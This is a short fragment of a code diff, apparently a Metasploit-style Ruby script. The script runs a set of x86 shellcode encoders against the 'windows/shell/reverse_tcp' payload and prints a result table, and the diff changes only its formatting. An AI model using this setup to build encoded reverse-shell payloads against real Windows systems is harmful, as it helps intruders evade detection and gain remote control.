'x86/fnstenv_mov',
|
||||||
'x86/countdown',
|
'x86/countdown',
|
||||||
'x86/call4_dword_xor'
|
'x86/call4_dword_xor'
|
||||||
]
|
]
|
||||||
|
|
||||||
payload_name = 'windows/shell/reverse_tcp'
|
payload_name = 'windows/shell/reverse_tcp'
|
||||||
|
|
||||||
verbose = false
|
verbose = false
|
||||||
|
|
||||||
result_table = run( encoders, payload_name, verbose )
|
|
||||||
|
|
||||||
print_line( "\n\n#{result_table.to_s}\n\n" )
|
result_table = run(encoders, payload_name, verbose)
|
||||||
|
|
||||||
print_line( "[+] Finished.\n" )
|
print_line("\n\n#{result_table.to_s}\n\n")
|
||||||
|
|
||||||
|
print_line("[+] Finished.\n")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue